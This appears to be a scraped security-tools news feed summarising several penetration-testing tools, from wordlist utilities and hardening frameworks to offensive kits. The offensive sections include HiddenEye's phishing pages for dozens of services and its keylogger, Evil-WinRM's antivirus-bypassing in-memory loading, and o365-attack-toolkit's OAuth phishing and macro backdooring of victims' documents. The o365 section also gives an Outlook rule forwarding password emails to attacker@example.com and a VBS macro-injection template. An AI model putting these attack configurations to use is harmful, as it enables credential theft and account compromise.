Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5843 articles
Browse latest View live

Hvazard - Remove Short Passwords & Duplicates, Change Lowercase To Uppercase & Reverse, Combine Wordlists!

$
0
0


Remove short passwords& duplicates, change lowercase to uppercase & reverse, combine wordlists!

Manual & explaination
-d --dict Specifies the file you want to modify. This is the only parameter / argument that is not optional.
-o --out The output filename (optional). Default is out.txt.
-s --short This operation removes the lines with length shorter/equal to the specified number. Example: python dm.py -d dictionary.txt -s 5 <- This removes all lines with 5 or less characters of the file dictionary.txt
-d --dupli This operation removes duplicate lines. If a line appears more than once, it gets removed. This is done so no password is tried more than once, since it is a waste of time. Example: python dm.py -d wordlist -d
-l --lower This operation turns all upper-case letters to lower-case. Lower-case letters remain that way. Example: python dm.py --lower -d dictionary
-u --upper This operation turns all lower-case letters to upper-case. upper-case letters remain that way. Example: python dm.py -u -d file.txt
-j --join This operation joins two files together to great one larger file. Example: python dm.py -d wd1.txt -j wd2.txt <- The result is saved on the second wordlist (wd2.txt)
-c --cut This operation removes all lines before the line number you specify. Useful if you have already used a large part of the wordlist and do not want to go through the same process. Example: python --cut rockyou.txt -o cutrocku.txt
-e --exp This option shows this message.
-a --arg This option shows the arguments & options.



SUDO_KILLER - A Tool To Identify And Exploit Sudo Rules Misconfigurations And Vulnerabilities Within Sudo

$
0
0

If you like the project and for my personal motivation so as to develop other tools please a +1 star *

SUDO_KILLER
SUDO_KILLER is a tool which help to abuse SUDO in different ways and with the main objective of performing a privilege escalation on linux environment.
The tool helps to identify misconfiguration within sudo rules, vulnerability within the version of sudo being used (CVEs and vulns) and the used of dangerous binary, all of these could be abuse to elevate privilege to ROOT.
SUDO_KILLER will then provide a list of commands or local exploits which could be exploited to elevate privilege.
SUDO_KILLER does not perform any exploitation on your behalf, the exploitation will need to be performed manually and this is intended.

Default usage
Example: ./sudo_killer.sh -c -r report.txt -e /tmp/

Arguments
-k : Keywords
-e : export location (export /etc/sudoers)
-c : include CVE checks with respect to sudo version
-s : supply user password for sudo checks (not recommended ++except for CTF)
-r : report name (save the output)
-h : help

CVEs check
To update the CVE database : run the following script ./cve_update.sh

IMPORTANT !!!
If you need to input a password to run sudo -l then the script will not work if you don't provide a password with the argument -s.
**NOTE : sudo_killer does not exploit automatically by itself, it was designed like this on purpose but check for misconguration and vulnerabilities and then propose you the following (if you are lucky the route to root is near!) :
  • a list of commands to exploit
  • a list of exploits
  • some description on how and why the attack could be performed

Why is it possible to run "sudo -l" without a password?
By default, if the NOPASSWD tag is applied to any of the entries for a user on a host, he or she will be able to run "sudo -l" without a password. This behavior may be overridden via the verifypw and listpw options.
However, these rules only affect the current user, so if user impersonation is possible (using su) sudo -l should be launched from this user as well.
Sometimes the file /etc/sudoers can be read even if sudo -l is not accessible without password.

Testing the tool :)
Will soon provide a docker to test the different scenarios :) ... Stay connected!


HiddenEye - Modern Phishing Tool With Advanced Functionality (Android-Support-Available)

$
0
0

Modern Phishing Tool With Advanced Functionality

PHISHING | KEYLOGGER | INFORMATION_COLLECTOR | ALL_IN_ONE_TOOL | SOCIALENGINEERING

DEVELOPERS & CONTRIBUTORS
  1. ANONUD4Y (https://github.com/An0nUD4Y)
  2. USAMA ABDUL SATTAR (https://github.com/usama7628674)
  3. sTiKyt (https://github.com/sTiKyt)
  4. UNDEADSEC (https://github.com/UndeadSec)
  5. Micrafast (https://github.com/Micrafast)
  6. ___________ (WAITING FOR YOU)

SCREENSHOT (Android-Userland)


CREDIT:-
  • Anonud4y ( I don't remember if i have done Anything )
  • Usama ( A Most active Developer)
  • sTiKyt ( Guy Who recustomized everything )
  • UNDEADSEC (For His wonderful repo socialfish which motivated us a lot)
  • TheLinuxChoice ( For His Tools Phishing Pages )

TESTED ON FOLLOWING:-
  • Kali Linux - Rolling Edition
  • Parrot OS - Rolling Edition
  • Linux Mint - 18.3 Sylvia
  • Ubuntu - 16.04.3 LTS
  • MacOS High Sierra
  • Arch Linux
  • Manjaro XFCE Edition 17.1.12
  • Black Arch
  • Userland app (For Android Users)

PREREQUISITES ( Please verify if you have installed )
  • Python 3
  • Wget from Python
  • PHP
  • sudo

FOUND A BUG ? / HAVE ANY ISSUE ? :- (Read This)
  • Check closed & solved issues/bugs before opening new.
  • Make sure your issue is related to the codes and resources of this repository.
  • Its your responsibility to response on your opened issues.
  • If we don't found user response on his/her issue in the particular time interval , Then we have to close that issue.
  • Do Not Spam or Advertise & Respect Everyone.

WHAT'S NEW FEATURES
1) LIVE ATTACK
  • Now you will have live information about the victims such as : IP ADDRESS, Geolocation, ISP, Country, & many more.
2) COMPATIBILITY
  • All the sites are mobile compatible.
3) KEYLOGGER
  • Now you will also have the ability to capture all the keystokes of victim.
  • You can now Deploy Keyloggers With (Y/N) option.
  • Major issues fixed.
4) ANDROID SUPPORT
  • We care about Android Users, So now we have came with two ways to run HiddenEye in Android Devices.
(A) UserLand App
  • You Have to Download UserLand App. Click Here To Download it.
  • To read more how to set up userland app Read HERE
(B) Termux App
  • You Have to Download Termux App. Click Here To Download it.
  • For Further instruction Check Instructions
  • Termux Users Clone With This Command , Unless Errors may occur during Running.
git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git
5) NEW LOOK PROVIDED
  • NOW FOCUS EASILY ON TASKS...
  • CUSTOMIZE APP WITH YOUR OWN THEMES
6) SERVEO URL TYPE SELECTION AVAILABLE NOW
  • Major issues with serveo is fixed.
  • Now You can choose out of CUSTOM URL and RANDOM URL.
7) LARGE COLLECTION OF PHISHING PAGES ADDED
  • Pages are taken from various tool including ShellPhish , Blackeye , SocialFish .

FOR FURTHER INSTALLATION PROCEDURE - (CHECK INSTRUCTIONS)

AVAILABLE PAGES
1) Facebook:
  • Traditional Facebook login page.
  • Advanced Poll Method.
  • Fake Security login with Facebook Page.
  • Facebook messenger login page.
2) Google:
  • Traditional Google login page.
  • Advanced Poll Method.
  • New Google Page.
3) LinkedIn:
  • Traditional LinkedIn login page.
4) Github:
  • Traditional Github login page.
5) Stackoverflow:
  • Traditional Stackoverflow login page.
6) Wordpress:
  • Similar Wordpress login page.
7) Twitter:
  • Traditional Twitter login page.
8) Instagram:
  • Traditional Instagram login page.
  • Instagram Autoliker Phishing Page.
  • Instagram Profile Scenario Advanced attack.
  • Instagram Badge Verify Attack [New]
  • Instagram AutoFollower Phishing Page by (https://github.com/thelinuxchoice)
9) SNAPCHAT PHISHING:
  • Traditional Snapchat Login Page
10) YAHOO PHISHING:
  • Traditional Yahoo Login Page
11) TWITCH PHISHING:
  • Traditional Twitch Login Page [ Login With Facebook Also Available ]
12) MICROSOFT PHISHING:
  • Traditional Microsoft-Live Web Login Page
13) STEAM PHISHING:
  • Traditional Steam Web Login Page
14) VK PHISHING:
  • Traditional VK Web Login Page
  • Advanced Poll Method
15) ICLOUD PHISHING:
  • Traditional iCloud Web Login Page
16) GitLab PHISHING:
  • Traditional GitLab Login Page
17) NetFlix PHISHING:
  • Traditional Netflix Login Page
18) Origin PHISHING:
  • Traditional Origin Login Page
19) Pinterest PHISHING:
  • Traditional Pinterest Login Page
20) Protonmail PHISHING:
  • Traditional Protonmail Login Page
21) Spotify PHISHING:
  • Traditional Spotify Login Page
22) Quora PHISHING:
  • Traditional Quora Login Page
23) PornHub PHISHING:
  • Traditional PornHub Login Page
24) Adobe PHISHING:
  • Traditional Adobe Login Page
25) Badoo PHISHING:
  • Traditional Badoo Login Page
26) CryptoCurrency PHISHING:
  • Traditional CryptoCurrency Login Page
27) DevianArt PHISHING:
  • Traditional DevianArt Login Page
28) DropBox PHISHING:
  • Traditional DropBox Login Page
29) eBay PHISHING:
  • Traditional eBay Login Page
30) MySpace PHISHING:
  • Traditional Myspace Login Page
31) PayPal PHISHING:
  • Traditional PayPal Login Page
32) Shopify PHISHING:
  • Traditional Shopify Login Page
33) Verizon PHISHING:
  • Traditional Verizon Login Page
34) Yandex PHISHING:
  • Traditional Yandex Login Page

Ascii error fix
dpkg-reconfigure locales
Then select: "All locales" Then select "en_US.UTF-8"
After that reboot your machine. Then open terminal and run the command: "locale"
There you will see "en_US.UTF-8" which is the default language. Instead of POSIX.

DISCLAIMER
TO BE USED FOR EDUCATIONAL PURPOSES ONLY
The use of the HiddenEye is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read LICENSE.


Dockernymous - A Script Used To Create A Whonix Like Gateway/Workstation Environment With Docker Containers

$
0
0

Dockernymous is a start script for Docker that runs and configures two individual Linux containers in order act as a anonymisation workstation-gateway set up.
It's aimed towards experienced Linux/Docker users, security professionals and penetration testers!
The gateway container acts as a Anonymizing Middlebox (see https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy) and routes ALL traffic from the workstation container through the Tor Network.
The idea was to create a whonix-like setup (see https://www.whonix.org) that runs on systems which aren't able to efficiently run two hardware virtualized machines or don't have virtualization capacities at all. 

Requirements:
Host (Linux):
  • docker
  • vncviewer
  • xterm
  • curl
Gateway Image:
  • Linux (e.g. Alpine, Debian )
  • tor
  • procps
  • ncat
  • iptables
Workstation Image:
  • Linux (e.g. Kali)
  • ‎xfce4 or another desktop environment (for vnc access)
  • tightvncserver

Instructions:
1. Host
To clone the dockernymous repository type:
git clone https://github.com/bcapptain/dockernymous.git
Dockernymous needs an up and running Docker environment and a non-default docker network. Let's create one:
docker network create --driver=bridge --subnet=192.168.0.0/24 docker_internal
2. Gateway (Alpine):
Get a lightweight gateway Image! For example Alpine:
docker pull alpine
Run the image, update the package list, install iptables & tor:
docker run -it alpine /bin/sh
apk add --update tor iptables iproute2
exit
Feel free to further customize the gateway for your needs before you extit.
To make this permanent you have to create a new image from the gateway container we just set up. Each time you run dockernymous a new container is created from that image and disposed on exit:
docker commit [Container ID] my_gateway
Get the container ID by running:
docker ps -a
3. Workstation (Kali Linux):
Get an image for the Workstation. For example, Kali Linux for penetration testing:
docker pull kalilinux/kali-linux-docker
Update and install the tools you would like to use (see https://www.kali.org/news/kali-linux-metapackages/).
docker run -it kalilinux/kali-linux-docker /bin/bash
apt-get update
apt-get dist-upgrade
apt install kali-linux-top10
Make sure the tightvncserver and curl packages are installed which is the case with most Kali Metapackages.
apt-get install tightvncserver
apt-get install curl
Install xfce4 for a minimal graphical Desktop:
$ apt-get install xfce4 
$ apt-get clean
$ exit
As with the Gateway, to make this permanent you have to create an image from that customized container. Each time you run dockernymous a new container is created and disposed on exit.
$ docker commit [Container ID] my_workstation
Get the container ID by running:
$ docker ps -a
4. Run dockernymous In case you changed the names for the images to something different (defaults are: "docker_internal" (network), "my_gateway" (gateway), "my_workstation" (you guess it)) open dockernymous.sh with your favorite editor and update the actual names in the configuration section.
Everything should be set up by now, let's give it a try! Run Dockernymus (don't forget to 'cd' into the cloned folder):
bash dockernymous.sh
or mark it executable once:
chmod +x dockernymous.sh 
and always run it with:
./dockernymous.sh
I'm happy for feedback. Please remember that dockernymous is still under development. The script is pretty messy, yet so consider it as a alpha phased project (no versioning yet).


VulnWhisperer - Create Actionable Data From Your Vulnerability Scans

$
0
0


Create actionable data from your vulnerability scans


VulnWhisperer is a vulnerability management tool and report aggregator. VulnWhisperer will pull all the reports from the different Vulnerability scanners and create a file with a unique filename for each one, using that data later to sync with Jira and feed Logstash. Jira does a closed cycle full Sync with the data provided by the Scanners, while Logstash indexes and tags all of the information inside the report (see logstash files at /resources/elk6/pipeline/). Data is then shipped to ElasticSearch to be indexed and ends up in a visual and searchable format in Kibana with already defined dashboards.

Currently Supports

Vulnerability Frameworks

Reporting Frameworks

Getting Started
  1. Follow the install requirements
  2. Fill out the section you want to process in frameworks_example.ini file
  3. [JIRA] If using Jira, fill Jira config in the config file mentioned above.
  4. [ELK] Modify the IP settings in the Logstash files to accommodate your environment and import them to your logstash conf directory (default is /etc/logstash/conf.d/)
  5. [ELK] Import the Kibana visualizations
  6. Run Vulnwhisperer
Need assistance or just want to chat? Join our slack channel

Requirements


  • Python 2.7
  • Vulnerability Scanner
  • Reporting System: Jira / ElasticStack 6.6

Install Requirements-VulnWhisperer(may require sudo)
Install OS packages requirement dependencies (Debian-based distros, CentOS don't need it)
sudo apt-get install  zlib1g-dev libxml2-dev libxslt1-dev 
(Optional) Use a python virtualenv to not mess with host python libraries
virtualenv venv (will create the python 2.7 virtualenv)
source venv/bin/activate (start the virtualenv, now pip will run there and should install libraries without sudo)

deactivate (for quitting the virtualenv once you are done)
Install python libraries requirements
pip install -r /path/to/VulnWhisperer/requirements.txt
cd /path/to/VulnWhisperer
python setup.py install
(Optional) If using a proxy, add proxy URL as environment variable to PATH
export HTTP_PROXY=http://example.com:8080
export HTTPS_PROXY=http://example.com:8080
Now you're ready to pull down scans. (see run section)

Configuration
There are a few configuration steps to setting up VulnWhisperer:
  • Configure Ini file
  • Setup Logstash File
  • Import ElasticSearch Templates
  • Import Kibana Dashboards
frameworks_example.ini file


Run
To run, fill out the configuration file with your vulnerability scanner settings. Then you can execute from the command line.
(optional flag: -F -> provides "Fancy" log colouring, good for comprehension when manually executing VulnWhisperer)
vuln_whisperer -c configs/frameworks_example.ini -s nessus
or
vuln_whisperer -c configs/frameworks_example.ini -s qualys
If no section is specified (e.g. -s nessus), vulnwhisperer will check on the config file for the modules that have the property enabled=true and run them sequentially.

Next you'll need to import the visualizations into Kibana and setup your logstash config. You can either follow the sample setup instructions [here](https://github.com/HASecuritySolutions/VulnWhisperer/wiki/Sample-Guide-ELK-Deployment) or go for the `docker-compose` solution we offer.
Docker-compose
ELK is a whole world by itself, and for newcomers to the platform, it requires basic Linux skills and usually a bit of troubleshooting until it is deployed and working as expected. As we are not able to provide support for each users ELK problems, we put together a docker-compose which includes:
  • VulnWhisperer
  • Logstash 6.6
  • ElasticSearch 6.6
  • Kibana 6.6
The docker-compose just requires specifying the paths where the VulnWhisperer data will be saved, and where the config files reside. If ran directly after git clone, with just adding the Scanner config to the VulnWhisperer config file (/resources/elk6/vulnwhisperer.ini), it will work out of the box.
It also takes care to load the Kibana Dashboards and Visualizations automatically through the API, which needs to be done manually otherwise at Kibana's startup.
For more info about the docker-compose, check on the docker-compose wiki or the FAQ.

Getting Started
Our current Roadmap is as follows:
  • Create a Vulnerability Standard
  • Map every scanner results to the standard
  • Create Scanner module guidelines for easy integration of new scanners (consistency will allow #14)
  • Refactor the code to reuse functions and enable full compatibility among modules
  • Change Nessus CSV to JSON (Consistency and Fix #82)
  • Adapt single Logstash to standard and Kibana Dashboards
  • Implement Detectify Scanner
  • Implement Splunk Reporting/Dashboards
On top of this, we try to focus on fixing bugs as soon as possible, which might delay the development. We also very welcome PR's, and once we have the new standard implemented, it will be very easy to add compatibility with new scanners.
The Vulnerability Standard will initially be a new simple one level JSON with all the information that matches from the different scanners having standardized variable names, while maintaining the rest of the variables as they are. In the future, once everything is implemented, we will evaluate moving to an existing standard like ECS or AWS Vulnerability Schema; we prioritize functionality over perfection.

Video Walkthrough -- Featured on ElasticWebinar


Authors

Contributors


AMIRA - Automated Malware Incident Response & Analysis

$
0
0

AMIRA is a service for automatically running the analysis on the OSXCollector output files. The automated analysis is performed via OSXCollector Output Filters, in particular The One Filter to Rule Them All: the Analyze Filter. AMIRA takes care of retrieving the output files from an S3 bucket, running the Analyze Filter and then uploading the results of the analysis back to S3 (although one could envision as well attaching them to the related JIRA ticket).

Prerequisites

tox
The following steps assume you have tox installed on your machine.
If this is not the case, please run:
$ sudo pip install tox

OSXCollector Output Filters configuration file
AMIRA uses OSXCollector Output Filters to do the actual analysis, so you will need to have a valid osxcollector.yaml configuration file in the working directory. The example configuration file can be found in the OSXCollector Output Filters.
The configuration file mentions the location of the file hash and the domain blacklists. Make sure that the blacklist locations mentioned in the configuration file are also available when running AMIRA.

AWS credentials
AMIRA uses boto to interface with AWS. You can supply the credentials using either of the possible boto config files.
The credentials should allow reading and deleting SQS messages from the SQS queue specified in the AMIRA config as well as the read access to the objects in the S3 bucket where the OSXCollector output files are stored. To be able to upload the analysis results back to the S3 bucket specified in the AMIRA configuration file, the credentials should also allow write access to this bucket.

AMIRA Architecture
The service uses the S3 bucket event notifications to trigger the analysis. You will need to configure an S3 bucket for the OSXCollector output files, so that when a file is added there the notification will be sent to an SQS queue (AmiraS3EventNotifications in the picture below). AMIRA periodically checks the queue for any new messages and upon receiving one it will fetch the OSXCollector output file from the S3 bucket. It will then run the Analyze Filter on the retrieved file.
The Analyze Filter runs all the filters contained in the OSXCollector Output Filters package sequentially. Some of them communicate with the external resources, like domain and hashes blacklists (or whitelists) and threat intel APIs, e.g. VirusTotal, OpenDNS Investigate or ShadowServer. The original OSXCollector output is extended with all of this information and the very last filter run by the Analyze Filter summarizes all of the findings into a human-readable form. After the filter finishes running, the results of the analysis will be uploaded to the Analysis Results S3 bucket.
The overview of the whole process and the system components involved in it are depicted below:


Using AMIRA
The main entry point to AMIRA is in the amira/amira.py module. You will first need to create an instance of AMIRA class by providing the AWS region name, where the SQS queue with the event notifications for the OSXCollector output bucket is, and the SQS queue name:
from amira.amira import AMIRA

amira = AMIRA('us-west-1', 'AmiraS3EventNotifications')
Then you can register the analysis results uploader, e.g. the S3 results uploader:
from amira.s3 import S3ResultsUploader

s3_results_uploader = S3ResultsUploader('amira-results-bucket')
amira.register_results_uploader(s3_results_uploader)
Finally, run AMIRA:
amira.run()
Go get some coffee, sit back, relax and wait till the analysis results pop up in the S3 bucket!


Airopy - Get Clients And Access Points

$
0
0

Get clients and access points. With Alfa cards this script works correctly.

Dependencies
To run this script first install requirements as follows:
sudo pip3 install requirements.txt   

How to use
In the examples I don't add 'sudo', but to execute them you need high privileges.
To get help:
python3 airopy.py -h  
To get APS:
python3 airopy.py -i wlx00c0ca81fb80 --aps  
To get Stations:
python3 airopy.py -i wlx00c0ca81fb80 --stations  
To get APS and Stations:
python3 airopy.py -i wlx00c0ca81fb80 --aps --stations  
To filter by a particular vendor:
python3 airopy.py -i wlx00c0ca81fb80 --stations -d 0  
To filter mac vendors, please check the number in mac_vendors.py. This last option can return unwanted devices, as it is based on the following unvalidated prefixes on my part:
If you use it in America, add --america.

Author
Josué Encinar


Evil-Winrm - The Ultimate WinRM Shell For Hacking/Pentesting

$
0
0

The ultimate WinRM shell for hacking/pentesting.

   ___ __ __  ____  _                  
/ _] | || || |
/ [_| | | | | | |
| _] | | | | | |___
| [_| : | | | | |
| |\ / | | | |
|_____| \_/ |____||_____|

__ __ ____ ____ ____ ___ ___
| |__| || || \ | \ | | |
| | | | | | | _ || D )| _ _ |
| | | | | | | | || / | \_/ |
| ` ' | | | | | || \ | | |
\ / | | | | || . \| | |
\_/\_/ |____||__|__||__|\_||___|___|


By: CyberVaca@HackPlayers

Description & Purpose
This shell is the ultimate WinRM shell for hacking/pentesting.
WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system adminsitrators.
This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.

Features
  • Command History
  • WinRM command completion
  • Local files completion
  • Upload and download files
  • List remote machine services
  • FullLanguage Powershell language mode
  • Load Powershell scripts
  • Load in memory dll files bypassing some AVs
  • Load in memory C# (C Sharp) compiled exe files bypassing some AVs
  • Colorization on output messages (can be disabled optionally)

Help
Usage: evil-winrm -i IP -u USER -s SCRIPTS_PATH -e EXES_PATH [-P PORT] [-p PASS] [-U URL]
-i, --ip IP Remote host IP or hostname (required)
-P, --port PORT Remote host port (default 5985)
-u, --user USER Username (required)
-p, --password PASS Password
-s, --scripts PS_SCRIPTS_PATH Powershell scripts path (required)
-e, --executables EXES_PATH C# executables path (required)
-U, --url URL Remote url endpoint (default /wsman)
-V, --version Show version
-h, --help Display this help message

Requirements
Ruby 2.3 or higher is needed. Some ruby gems are needed as well: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2 and colorize >=0.8.1.
~$ sudo gem install winrm winrm-fs colorize stringio

Installation & Quick Start
  • Step 1. Clone the repo: git clone https://github.com/Hackplayers/evil-winrm.git
  • Step 2. Ready. Just launch it! ~$ cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
If you don't want to put the password in clear text, you can optionally avoid to set -p argument and the password will be prompted preventing to be shown.
To use IPv6, the address must be added to /etc/hosts.

Alternative installation method as ruby gem
  • Step 1. Install it: gem install evil-winrm
  • Step 2. Ready. Just launch it! ~$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Documentation

Basic commands
  • upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.
    • usage: upload local_path remote_path
  • download: it is not needed to set local_path if the remote file is in the current directory.
    • usage: download remote_path local_path
  • services: list all services. No administrator permissions needed.
  • menu: load the Invoke-Binary and l04d3r-LoadDll functions that we will explain below. When a ps1 is loaded all its functions will be shown up.

Load powershell scripts
  • To load a ps1 file you just have to type the name (auto-completion usnig tab allowed). The scripts must be in the path set at -s argument. Type menu again and see the loaded functions.

Advanced commands
  • Invoke-Binary: allows exes compiled from c# to be executed in memory. The name can be auto-completed using tab key and allows up to 3 parameters. The executables must be in the path set at -e argument.

  • l04d3r-LoadDll: allows loading dll libraries in memory, it is equivalent to: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))
    The dll file can be hosted by smb, http or locally. Once it is loaded type menu, then it is possible to autocomplete all functions. 


Extra features
  • To disable colors just modify on code this variable $colors_enabled. Set it to false: $colors_enabled = false

Credits:
Main author:
Collaborators, developers, documenters, testers and supporters:
Hat tip to:

Disclaimer & License
This script is licensed under LGPLv3+. Direct link to License.
Evil-WinRM should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner's permission.



Pyattck - A Python Module To Interact With The Mitre ATT&CK Framework

$
0
0

A Python Module to interact with the Mitre ATT&CK Framework.

pyattck has the following notable features in it's current release:
  • Retrieve all Tactics, Techniques, Actors, Malware, Tools, and Mitigations
  • All techniques have suggested mitigations as a property
  • For each class you can access additional information about related data points:
  • Actor
    • Tools used by the Actor or Group
    • Malware used by the Actor or Group
    • Techniques this Actor or Group uses
  • Malware
    • Actor or Group(s) using this malware
    • Techniques this malware is used with
  • Mitigation
    • Techniques related to a specific set of mitigation suggestions
  • Tactic
    • Techniques found in a specific Tactic (phase)
  • Technique
    • Tactics a technique is found in
    • Mitigation suggestions for a given technique
    • Actor or Group(s) identified as using this technique
  • Tools
    • Techniques that the specified tool is used within
    • Actor or Group(s) using a specified tool

Installation
OS X & Linux:
pip install pyattck
Windows:
pip install pyattck

Usage example
To use pyattck you must instantiate a Attck object:
from pyattck import Attck

attack = Attck()
You can access the following properties on your Attck object:
  • actor
  • malware
  • mitigation
  • tactic
  • technique
  • tools
Below are examples of accessing each of these properties:
from pyattck import Attck

attack = Attck()

# accessing actors
for actor in attack.actors:
print(actor)

# accessing malware used by an actor or group
for malware in actor.malware:
print(malware)

# accessing tools used by an actor or group
for tool in actor.tools:
print(tool)

# accessing techniques used by an actor or group
for technique in actor.techniques:
print(technique)

# accessing malware
for malware in attack.malwares:
print(malware)

# accessing actor or groups using this malware
for actor in malware.actors:
print(actor)

# accessing techniques that this malware is used in
for technique in malware.techniques:
print(technique)

# accessing mitigation
for mitigation in attack.mitigations:
print(mit)

# accessing techni ques related to mitigation recommendations
for technique in mitigation.techniques:
print(technique)

# accessing tactics
for tactic in attack.tactics:
print(tactic)

# accessing techniques related to this tactic
for technique in tactic.techniques:
print(technique)

# accessing techniques
for technique in attack.techniques:
print(technique)

# accessing tactics that this technique belongs to
for tactic in technique.tactics:
print(tactic)

# accessing mitigation recommendations for this technique
for mitigation in technique.mitigation:
print(mitigation)

# accessing actors using this technique
for actor in technique.actors:
print(actor)


# accessing tools
for tool in attack.tools:
print(tool)

# accessing techniques this tool is used in
for technique in tool.techniques:
print(technique)

# accessing actor or groups using this tool
for actor in tool.actors:
print(actor)

Release History
  • 1.0.0
    • Initial release of pyattck to PyPi
  • 1.0.1
    • Updating Documentation with new reference links

Meta
Josh Rickard – @MSAdministratorrickardja@live.com
Distributed under the MIT license. See LICENSE for more information.

Contributing
  1. Fork it (https://github.com/swimlane/pyattck/fork)
  2. Create your feature branch (git checkout -b feature/fooBar)
  3. Commit your changes (git commit -am 'Add some fooBar')
  4. Push to the branch (git push origin feature/fooBar)
  5. Create a new Pull Request


O365-Attack-Toolkit - A Toolkit To Attack Office365

$
0
0
o365-attack-toolkit allows operators to perform an OAuth phishing attack and later on use the Microsoft Graph API to extract interesting information.
Some of the implemented features are :
  • Extraction of keyworded e-mails from Outlook.
  • Creation of Outlook Rules.
  • Extraction of files from OneDrive/Sharepoint.
  • Injection of macros on Word documents.

Architecture


The toolkit consists of several components

Phishing endpoint
The phishing endpoint is responsible for serving the HTML file that performs the OAuth token phishing.

Backend services
Afterward, the token will be used by the backend services to perform the defined attacks.

Management interface
The management interface can be utilized to inspect the extracted information from the Microsoft Graph API.

Features

Outlook Keyworded Extraction
User emails can be extracted by this toolkit using keywords. For every defined keyword in the configuration file, all the emails that match them will be downloaded and saved in the database. The operator can inspect the downloaded emails through the management interface.

Onedrive/Sharepoint Keyworded Extraction
Microsoft Graph API can be used to access files across OneDrive, OneDrive for Business and SharePoint document libraries. User files can be extracted by this toolkit using keywords. For every defined keyword in the configuration file, all the documents that match them will be downloaded and saved locally. The operator can examine the documents using the management interface.

Outlook Rules Creation
Microsoft Graph API supports the creation of Outlook rules. You can define different rules by putting the rule JSON files in the rules/ folder. https://docs.microsoft.com/en-us/graph/api/mailfolder-post-messagerules?view=graph-rest-1.0&tabs=cs
Below is an example rule that when loaded, it will forward every email that contains password in the body to attacker@example.com.
{      
"displayName": "Example Rule",
"sequence": 2,
"isEnabled": true,
"conditions": {
"bodyContains": [
"password"
]
},
"actions": {
"forwardTo": [
{
"emailAddress": {
"name": "Attacker Email",
"address": "attacker@example.com"
}
}
],
"stopProcessingRules": false
}
}

Word Document Macro Backdooring
Users documents hosted on OneDrive can be backdoored by injecting macros. If this feature is enabled, the last 15 documents accessed by the user will be downloaded and backdoored with the macro defined in the configuration file. After the backdoored file has been uploaded, the extension of the document will be changed to .doc in order for the macro to be supported on Word. It should be noted that after backdooring the documents, they can not be edited online which increases the chances of our payload execution.
This functionality can only be used on Windows because the insertion of macros is done using the Word COM object. A VBS file is built by the template below and executed so don't panic if you see wscript.exe running.
 Dim wdApp   Set wdApp = CreateObject("Word.Application")   wdApp.Documents.Open("{DOCUMENT}")   wdApp.Documents(1).VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "{MACRO}"   wdApp.Documents(1).SaveAs2 "{OUTPUT}", 0   wdApp.Quit  

How to set up

Compile
 Dim wdApp
Set wdApp = CreateObject("Word.Application")
wdApp.Documents.Open("{DOCUMENT}")
wdApp.Documents(1).VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "{MACRO}"
wdApp.Documents(1).SaveAs2 "{OUTPUT}", 0
wdApp.Quit

Configuration
An example configuration as below :
cd %GOPATH%
git clone https://github.com/0x09AL/o365-attack-toolkit
cd o365-attack-toolkit
dep ensure
go build

Deployment
Before start using this toolkit you need to create an Application on the Azure Portal. Go to Azure Active Directory -> App Registrations -> Register an application.


After creating the application, copy the Application ID and change it on static/index.html.
The URL(external listener) that will be used for phishing should be added as a Redirect URL. To add a redirect url, go the application and click Add a Redirect URL.


The Redirect URL should be the URL that will be used to host the phishing endpoint, in this case https://myphishingurl.com/


Make sure to check both the boxes as shown below :


It should be noted that you can run this tool on any Operating Systems that Go supports, but the Macro Backdooring Functionality will only work on Windows.
The look of the phishing page can be changed on static/index.html.

Security Considerations
Apart from all the features this tool has, it also opens some attack surface on the host running the tool. Firstly, the Macro Backdooring Functionality will open the word files, and if you are running an unpatched version of Office, bad things can happen. Additionally, the extraction of files can download malicious files which will be saved on your computer.
The best approach would be isolating the host properly and only allowing communication with the HTTPS redirector and Microsoft Graph API.

Management Interface
The management interface allows the operator to browse the data that has been extracted.

Users view


View User Emails


View Email



grapheneX - Automated System Hardening Framework

$
0
0

grapheneX
In computing, hardening is usually the process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions; in principle a single-function system is more secure than a multipurpose one. Reducing available ways of attack typically includes changing default passwords, the removal of unnecessary software, unnecessary usernames or logins, and the disabling or removal of unnecessary services.

Although the current technology tries to design systems as safe as possible, security flaws and situations that can lead to vulnerabilities caused by unconscious use and missing configurations still exist. The user must be knowledgeable about the technical side of system architecture and should be aware of the importance of securing his/her system from vulnerabilities like this. Unfortunately, it's not possible to know all the details about hardening and necessary commands for every ordinary user and the hardening remains to be a technical issue due to the difficulty of understanding operating system internals. Therefore there are hardening checklists that contain various commands and rules of the specified operating system available such as trimstray/linux-hardening-checklist& Windows Server Hardening Checklist on the internet for providing a set of commands with their sections and of course simplifying the concept for the end user. But still, the user must know the commands and apply the hardening manually depending on the system. That's where the grapheneX exactly comes in play.
The project name is derived from the 'graphene'. Graphene is a one-atom-thick layer of carbon atoms arranged in a hexagonal lattice. In proportion to its thickness, it is about 100 times stronger than the strongest steel.
grapheneX project aims to provide a framework for securing the system with hardening commands automatically. It's designed for the end user as well as the Linux and Windows developers due to the interface options. (interactive shell/web interface) In addition to that, grapheneX can be used to secure a web server/application.
